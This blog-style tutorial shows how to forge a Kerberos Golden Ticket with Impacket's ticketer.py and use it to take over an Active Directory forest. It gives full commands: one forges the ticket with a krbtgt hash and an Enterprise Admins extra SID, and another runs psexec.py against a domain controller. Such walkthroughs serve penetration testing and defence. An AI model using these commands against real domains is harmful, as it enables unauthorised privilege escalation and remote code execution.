Categories
active directory

🎵 “I’ve Got a Golden Ticket” 🎵

There are a couple of different ways that a Golden Ticket can be created and used when attacking an Active Directory environment. One of which is through the use of Impacket's ticketer.py. The nice thing about this script is that it allows you to attack from a Linux system, rather than using Mimikatz from a Windows system to create and pass the ticket.

Setup

The following shows how "Golden Tickets can now be used to compromise any domain in the AD Forest once a single one is compromised." [1] Some details (IP addresses, hashes, SIDs) have been edited due to their sensitive nature.

When using the ticketer.py script make sure that your /etc/hosts and /etc/krb5.conf files have the correct names. For example:

root@eternalnoob:~# cat /etc/hosts
127.0.0.1    localhost
127.0.1.1    kali
10.10.1.5    DEV.TEST.MINE.COM
10.10.1.5    DC01
10.10.2.5    TEST.MINE.COM
10.10.2.5    DC02

and then edit /etc/krb5.conf to include the correct realms

[realms]
DEV.TEST.MINE.COM = {
    kdc = tcp/DC01:88
}
TEST.MINE.COM = {
    kdc = tcp/DC02:88
}

If the krb5.conf file doesn't exist, it may need to be installed:

apt install krb5-user

Usage

Once your configurations are correct and in order, it's time to generate your ticket,

python /opt/impacket/examples/ticketer.py -nthash <krbtgt_hash> -domain-sid <sid_of_domain_you're_in> -domain <fqdn_domain_you're_in> <your_evil_username> -extra-sid <sid_of_domain_you're_going_to>

or something like this:

python /opt/impacket/examples/ticketer.py -nthash 12345678912345678912345678912345 -domain-sid S-1-5-21-1234567890-123456789-1234567890 -domain DEV.TEST.MINE.COM eviladmin -extra-sid S-1-5-21-9876543210-1234567890-9876543210-519

then export the ticket:

export KRB5CCNAME=eviladmin.ccache

and finally use it:

proxychains python /opt/impacket/examples/psexec.py -k -n eviladmin@DC01

Proxychains was used in order to access the targeted system. If no proxy is needed or used, omit that from the command.

Resources

  • https://artkond.com/2016/12/18/pivoting-kerberos/
  • https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/
  • http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/
  • Leave a Reply

    Your email address will not be published. Required fields are marked *

    sixteen + 16 =